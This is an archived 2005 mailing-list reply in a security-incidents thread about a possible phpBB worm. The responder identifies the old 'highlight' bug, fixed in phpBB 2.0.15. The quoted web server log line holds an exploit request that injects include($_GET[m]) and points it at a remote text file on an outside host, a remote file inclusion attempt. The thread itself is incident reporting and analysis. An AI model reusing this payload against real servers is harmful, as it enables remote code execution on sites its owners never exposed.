Security Incidents mailing list archives
Re: New (maybe old?) PhpBB worm about?
From: Alex 'CAVE' Cernat <cave () cernat ro>
Date: Mon, 12 Dec 2005 23:43:27 +0200
Robin wrote:
It's the old highlight bug (i've remember the %2527). I believe it was used an year ago (of course, with some unpatched phpbb installations, it is still active, maybe some new worm using this old technique). IIRC, the bug was fixed in 2.0.15 (the current version is now 2.0.18, so ... a long time).I just noticed these in my logs:63.193.240.128 - - [11/Dec/2005:01:43:25 +1300] "GET /pbem/viewtopic.php?t=37&highlight=%2527.$poster=include($_GET[m]). %2527&m=http://www.yatas.com/phpbb_private.txt?& HTTP/1.0" 403 1094 "http://www.google.nl/" "Mozilla/4.0 (modded by sirh0t fuck Aleks)"
Alex
Current thread:
- New (maybe old?) PhpBB worm about? Robin (Dec 12)
- Re: New (maybe old?) PhpBB worm about? bf (Dec 12)
- Re: New (maybe old?) PhpBB worm about? Alex 'CAVE' Cernat (Dec 14)